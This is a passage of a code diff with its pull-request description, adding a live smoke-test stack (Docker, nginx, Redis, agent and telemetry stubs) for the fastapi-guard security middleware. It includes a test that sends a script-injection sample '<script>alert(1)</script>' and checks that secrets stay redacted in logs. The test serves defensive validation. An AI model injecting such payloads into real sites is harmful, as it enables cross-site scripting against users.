+        "/basic/echo",
+        params={"sig": "LS-SIG", "q": "hello"},
+        headers=_BASE_HEADERS,
+        json={"note": "<script>alert(1)</script>"},
+    )
+
+    for _ in range(3):
+        client.get("/basic/ip", params=query_xss_params, headers=_BASE_HEADERS)
+
+    return client.get(
+        "/basic/ip", params={"sig": "LS-SIG", "q": "hello"}, headers=_BASE_HEADERS
+    )
+
+
+def _assert_expected_lines_present(lines: list[str]) -> None:
+    for expected in _MUST_APPEAR_ONCE:
+        assert any(expected in line for line in lines), f"missing log line: {expected}"
+
+
+def _assert_no_secret_leaked(text: str) -> None:
+    assert "[REDACTED]" in text
+    for secret in _RAW_SECRETS:
+        assert secret not in text, f"raw secret {secret!r} leaked into the log"
+    for marker in _MUST_STILL_SHOW:
+        assert marker in text, f"non-sensitive marker {marker!r} missing from the log"
+
+
+def _agent_events_seen(ctx: ScenarioContext) -> dict[str, Any] | None:
+    response = ctx.agent.get("/_debug/state")
+    if response.status_code != 200:
+        return None
+    state: dict[str, Any] = response.json()
+    detections = [
+        event
+        for event in state.get("events", [])
+        if event.get("event_type") == "pattern_detected"
+    ]
+    return state if detections else None
+
+
+def _assert_no_secret_in_telemetry(ctx: ScenarioContext) -> None:
+    state = wait_until(lambda: _agent_events_seen(ctx), timeout=30.0)
+    assert state is not None, "no detection event reached the agent stub"
+    dumped = json.dumps(state)
+    for secret in _RAW_SECRETS:
+        assert secret not in dumped, f"raw secret {secret!r} reached the agent stub"
+    previews = [
+        event.get("metadata", {}).get("content_preview")
+        for event in state["events"]
+        if event.get("event_type") == "pattern_detected"
+    ]
+    assert previews, "no pattern_detected event carried a content_preview"
+    assert all(
+        preview == "[REDACTED]" or "LS-" not in str(preview) for preview in previews
+    ), previews
+
+
+@scenario(
+    covers={
+        "log_sensitive_headers",
+        "log_sensitive_params",
+        "log_sensitive_body_fields",
+    },
+    config=CONFIG,
+)
+def sensitive_data_redacted_across_log_lines(ctx: ScenarioContext) -> None:
+    ctx.agent.post("/_debug/reset")
+    mark = ctx.stack.logs.mark()
+
+    banned = _run_battery(ctx.client)
+    assert banned.status_code == 403
+
+    lines = ctx.stack.logs.lines_since(mark)
+    guard_lines = [line for line in lines if " - guard_core" in line]
+    _assert_expected_lines_present(guard_lines)
+    _assert_no_secret_leaked("\n".join(guard_lines))
+    _assert_no_secret_in_telemetry(ctx)

--- a/tests/live_smoke/stack/Dockerfile
+++ b/tests/live_smoke/stack/Dockerfile
@@ -1,0 +1,24 @@
+FROM python:3.12-slim
+
+COPY --from=ghcr.io/astral-sh/uv:latest /uv /usr/local/bin/uv
+
+WORKDIR /app
+
+COPY wheels/ /wheels/
+
+RUN uv venv .venv && \
+    uv pip install --python .venv/bin/python /wheels/*.whl gunicorn "uvicorn[standard]" redis guard-agent httpx \
+        opentelemetry-sdk opentelemetry-exporter-otlp-proto-http logfire && \
+    .venv/bin/python -c "import guard_core, importlib.metadata as m; print('guard-core', m.version('guard-core'), guard_core.__file__)" && \
+    .venv/bin/python -c "import guard, importlib.metadata as m; print('fastapi-guard', m.version('fastapi-guard'), guard.__file__)"
+
+COPY app/ /app/app/
+COPY gunicorn.conf.py /app/
+
+ENV PATH="/app/.venv/bin:$PATH" \
+    PYTHONUNBUFFERED=1 \
+    PYTHONDONTWRITEBYTECODE=1
+
+EXPOSE 8000
+
+CMD ["gunicorn", "-c", "gunicorn.conf.py", "app.main:app"]

--- a/tests/live_smoke/stack/compose.yml
+++ b/tests/live_smoke/stack/compose.yml
@@ -1,0 +1,75 @@
+services:
+  nginx:
+    image: nginx:alpine
+    ports:
+      - "${LIVE_SMOKE_NGINX_PORT:-8089}:80"
+    volumes:
+      - ./nginx.conf:/etc/nginx/nginx.conf:ro
+    depends_on:
+      fastapi-guard-example:
+        condition: service_healthy
+
+  fastapi-guard-example:
+    build:
+      context: .
+    expose:
+      - "8000"
+    environment:
+      - "REDIS_URL=redis://redis:6379"
+      - "REDIS_PREFIX=smoke:"
+      - "IPINFO_TOKEN=test_token"
+      - "WEB_CONCURRENCY=1"
+      - "SMOKE_CONFIG_PATH=/smoke/config-${LIVE_SMOKE_PROJECT:-fastapi-guard-live-smoke}.json"
+      - "SMOKE_ON_BLOCK_LOG=/tmp/smoke-on-block.jsonl"
+      - "SMOKE_ON_ERROR_LOG=/smoke/on_error.jsonl"
+      - "LOGFIRE_TOKEN=pylf_v1_us_smoketesttoken00000000000000000000"
+      - "LOGFIRE_SEND_TO_LOGFIRE=true"
+      - "LOGFIRE_BASE_URL=http://otlp-stub:4318"
+    volumes:
+      - ./scenario_data:/smoke
+    healthcheck:
+      test: ["CMD", "python", "-c", "import urllib.request; urllib.request.urlopen('http://localhost:8000/health')"]
+      interval: 5s
+      timeout: 5s
+      retries: 6
+      start_period: 10s
+    depends_on:
+      redis:
+        condition: service_healthy
+      agent-stub:
+        condition: service_started
+      otlp-stub:
+        condition: service_started
+
+  agent-stub:
+    image: python:3.12-slim
+    working_dir: /agent
+    volumes:
+      - ../agent_stub.py:/agent/agent_stub.py:ro
+    command: ["python", "/agent/agent_stub.py"]
+    expose:
+      - "8090"
+    ports:
+      - "${LIVE_SMOKE_AGENT_PORT:-8091}:8090"
+
+  otlp-stub:
+    image: python:3.12-slim
+    working_dir: /otlp
+    volumes:
+      - ../otlp_stub.py:/otlp/otlp_stub.py:ro
+    command: ["python", "/otlp/otlp_stub.py"]
+    expose:
+      - "4318"
+    ports:
+      - "${LIVE_SMOKE_OTLP_STUB_PORT:-8092}:4318"
+
+  redis:
+    image: redis:7-alpine
+    command: redis-server --save "" --loglevel warning
+    ports:
+      - "${LIVE_SMOKE_REDIS_PORT:-16379}:6379"
+    healthcheck:
+      test: ["CMD", "redis-cli", "ping"]
+      interval: 5s
+      timeout: 5s
+      retries: 3

--- a/tests/live_smoke/stack/gunicorn.conf.py
+++ b/tests/live_smoke/stack/gunicorn.conf.py
@@ -1,0 +1,15 @@
+import multiprocessing
+import os
+
+bind = "0.0.0.0:8000"
+workers = int(os.environ.get("WEB_CONCURRENCY", multiprocessing.cpu_count() * 2 + 1))
+worker_class = "uvicorn.workers.UvicornWorker"
+timeout = 120
+keepalive = 5
+graceful_timeout = 30
+max_requests = 1000
+max_requests_jitter = 50
+
+accesslog = "-"
+errorlog = "-"
+loglevel = os.environ.get("LOG_LEVEL", "info")

--- a/tests/live_smoke/stack/nginx.conf
+++ b/tests/live_smoke/stack/nginx.conf
@@ -1,0 +1,78 @@
+worker_processes auto;
+
+events {
+    worker_connections 1024;
+}
+
+http {
+    include /etc/nginx/mime.types;
+    default_type application/octet-stream;
+
+    log_format main '$remote_addr - $remote_user [$time_local] "$request" '
+                    '$status $body_bytes_sent "$http_referer" '
+                    '"$http_user_agent" "$http_x_forwarded_for"';
+
+    access_log /var/log/nginx/access.log main;
+    error_log /var/log/nginx/error.log warn;
+
+    sendfile on;
+    tcp_nopush on;
+    tcp_nodelay on;
+    keepalive_timeout 65;
+
+    client_max_body_size 10m;
+
+    limit_req_zone $binary_remote_addr zone=general:10m rate=30r/s;
+
+    upstream app {
+        server fastapi-guard-example:8000;
+    }
+
+    server {
+        listen 80;
+        server_name _;
+
+        location /health {
+            proxy_pass http://app;
+            proxy_set_header Host $host;
+            proxy_set_header X-Real-IP 192.168.50.50;
+            proxy_set_header X-Forwarded-For 192.168.50.50;
+            proxy_set_header X-Forwarded-Proto $scheme;
+        }
+
+        location /ready {
+            proxy_pass http://app;
+            proxy_set_header Host $host;
+            proxy_set_header X-Real-IP 192.168.50.50;
+            proxy_set_header X-Forwarded-For 192.168.50.50;
+            proxy_set_header X-Forwarded-Proto $scheme;
+        }
+
+        location /ws {
+            proxy_pass http://app;
+            proxy_http_version 1.1;
+            proxy_set_header Upgrade $http_upgrade;
+            proxy_set_header Connection "upgrade";
+            proxy_set_header Host $host;
+            proxy_set_header X-Real-IP 192.168.50.50;
+            proxy_set_header X-Forwarded-For 192.168.50.50;
+            proxy_set_header X-Forwarded-Proto $scheme;
+            proxy_read_timeout 60s;
+        }
+
+        location / {
+            limit_req zone=general burst=50 nodelay;
+
+            proxy_pass http://app;
+            proxy_set_header Host $host;
+            proxy_set_header X-Real-IP 192.168.50.50;
+            proxy_set_header X-Forwarded-For 192.168.50.50;
+            proxy_set_header X-Forwarded-Proto $scheme;
+
+            proxy_request_buffering off;
+            proxy_connect_timeout 30s;
+            proxy_read_timeout 60s;
+            proxy_send_timeout 60s;
+        }
+    }
+}

--- a/tests/live_smoke/test_completeness.py
+++ b/tests/live_smoke/test_completeness.py
@@ -1,0 +1,36 @@
+from __future__ import annotations
+
+from guard_core.core.events.event_types import CHECK_NAME_VALUES
+from guard_core.decorators import SecurityDecorator
+from guard_core.models import SecurityConfig
+
+from tests.live_smoke.registry import SCENARIOS
+
+
+def _decorator_method_names() -> set[str]:
+    return {
+        name
+        for name in dir(SecurityDecorator)
+        if not name.startswith("_") and callable(getattr(SecurityDecorator, name))
+    }
+
+
+def _required_names() -> set[str]:
+    return (
+        set(SecurityConfig.model_fields)
+        | _decorator_method_names()
+        | set(CHECK_NAME_VALUES)
+    )
+
+
+def test_every_field_method_and_check_name_has_a_live_scenario() -> None:
+    covered: set[str] = set()
+    for item in SCENARIOS:
+        covered |= item.covers
+
+    missing = sorted(_required_names() - covered)
+    assert not missing, (
+        "no live-smoke scenario covers these SecurityConfig fields / "
+        "SecurityDecorator methods / pipeline check names "
+        f"({len(missing)} total):\n" + "\n".join(f"  - {name}" for name in missing)
+    )

--- a/tests/live_smoke/test_live_smoke.py
+++ b/tests/live_smoke/test_live_smoke.py
@@ -1,0 +1,16 @@
+from __future__ import annotations
+
+import pytest
+
+from tests.live_smoke.driver import ScenarioContext
+from tests.live_smoke.registry import SCENARIOS, Scenario, config_key
+
+_ORDERED: list[Scenario] = sorted(SCENARIOS, key=lambda item: config_key(item.config))
+
+
+@pytest.mark.parametrize(
+    "live_scenario", _ORDERED, ids=[item.name for item in _ORDERED]
+)
+def test_scenario(live_scenario: Scenario, scenario_context: ScenarioContext) -> None:
+    scenario_context.stack.restart_with(live_scenario.config)
+    live_scenario.func(scenario_context)


### PR DESCRIPTION
Closes #133

Two workflows, verified locally before this PR:

- `live-smoke.yml`: guard-core's live-smoke stack ported to this repo. Builds the fastapi-guard wheel from the PR checkout, runs `examples/advanced_app` behind nginx with Redis and the agent and OTLP stubs, drives all 24 scenario modules with the completeness gate. Adds websocket handshake scenarios: an attack-shaped handshake is rejected with 403 before accept, a blacklisted client IP is rejected with 403, a benign connect with one echo message succeeds with 101. Adds the smallest `/ws` echo route the docs describe to the advanced example and a websocket location to the stack's nginx config. Local run on Docker: 93 passed, 0 failed, under 5 minutes.
- `upstream-drift.yml`: nightly at 03:00 UTC and on demand. Builds a guard-core wheel from guard-core master, force-installs it over the resolved one with `--no-deps`, prints `guard_core.__file__` as proof of which tree ran, then runs the full suite on the Python matrix against the Redis service. Failure notifies Slack the same way `ci.yml` does. The override sequence was dry-run in a scratch environment and the workflow files pass actionlint.

First run to watch: cold Docker build time against the 30 minute timeout on `live-smoke.yml`, and the Slack step on a schedule-triggered `upstream-drift.yml` run.